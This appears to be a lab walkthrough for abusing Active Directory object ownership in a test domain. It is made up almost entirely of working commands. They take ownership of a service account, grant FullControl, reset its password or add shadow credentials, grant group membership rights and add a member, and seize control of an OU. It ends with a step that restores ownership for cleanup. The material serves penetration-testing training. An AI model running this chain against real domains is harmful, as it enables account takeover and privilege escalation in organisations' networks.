Set variables:
export DC=10.10.10.200
export DOMAIN=ootw.local
export USER=ben.carter
export PASS='StudentPass2026!'
Read the current owner first. We need it for cleanup.
owneredit.py -action read -target svc_web "$DOMAIN/$USER:$PASS" -dc-ip $DC
User Target: Ownership to Full Control
Take ownership, grant FullControl, then abuse the new right.
owneredit.py -action write -new-owner $USER -target svc_web "$DOMAIN/$USER:$PASS" -dc-ip $DC
dacledit.py -action write -rights FullControl -principal $USER -target svc_web "$DOMAIN/$USER:$PASS" -dc-ip $DC
bloodyAD -d $DOMAIN --host $DC -u $USER -p "$PASS" set password svc_web 'WebReset2026!'
nxc ldap $DC -d $DOMAIN -u svc_web -p 'WebReset2026!'
Shadow Credentials are often cleaner than a password reset after FullControl is granted:
certipy shadow auto -u $USER@$DOMAIN -p "$PASS" -account svc_web -dc-ip $DC
Group Target: Ownership to Member Write
owneredit.py -action write -new-owner $USER -target 'ACL Operators' "$DOMAIN/$USER:$PASS" -dc-ip $DC
dacledit.py -action write -rights WriteMembers -principal $USER -target 'ACL Operators' "$DOMAIN/$USER:$PASS" -dc-ip $DC
bloodyAD -d $DOMAIN --host $DC -u $USER -p "$PASS" add groupMember 'ACL Operators' alice.wright
bloodyAD -d $DOMAIN --host $DC -u $USER -p "$PASS" get object 'ACL Operators' --attr member
OU or GPO Target
Ownership over an OU or GPO is a control-plane issue. The follow-on action is usually to grant FullControl and then alter child-object permissions or policy content.
owneredit.py -action write -new-owner $USER -target-dn 'OU=Servers,OU=OOTW Lab,DC=ootw,DC=local' "$DOMAIN/$USER:$PASS" -dc-ip $DC
dacledit.py -action write -rights FullControl -principal $USER -target-dn 'OU=Servers,OU=OOTW Lab,DC=ootw,DC=local' "$DOMAIN/$USER:$PASS" -dc-ip $DC -inheritance
Restore ownership after the lab:
owneredit.py -action write -new-owner 'Domain Admins' -target svc_web "$DOMAIN/$USER:$PASS" -dc-ip $DC